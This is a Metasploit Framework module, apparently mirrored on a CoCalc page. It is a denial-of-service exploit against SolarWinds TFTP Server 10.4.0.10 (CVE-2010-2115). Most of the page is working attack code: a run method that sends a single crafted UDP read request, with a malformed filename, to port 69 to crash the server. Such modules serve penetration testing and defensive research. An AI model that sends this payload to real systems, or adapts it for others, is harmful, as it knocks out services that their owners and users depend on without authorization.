CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/tftp/solarwinds.rb
Views: 1904
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Udp
8
include Msf::Auxiliary::Dos
9
10
def initialize(info = {})
11
super(update_info(info,
12
'Name' => 'SolarWinds TFTP Server 10.4.0.10 Denial of Service' ,
13
'Description' => %q{
14
The SolarWinds TFTP server can be shut down by sending a 'netascii' read
15
request with a specially crafted file name.
16
},
17
'Author' => 'Nullthreat',
18
'License' => MSF_LICENSE,
19
'References' =>
20
[
21
[ 'CVE', '2010-2115' ],
22
[ 'OSVDB', '64845' ],
23
[ 'EDB', '12683' ]
24
],
25
'DisclosureDate' => '2010-05-21'))
26
27
register_options([
28
Opt::RPORT(69)
29
])
30
end
31
32
def run
33
connect_udp
34
print_status("Sending Crash request...")
35
udp_sock.put("\x00\x01\x01\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00")
36
disconnect_udp
37
end
38
end
39
40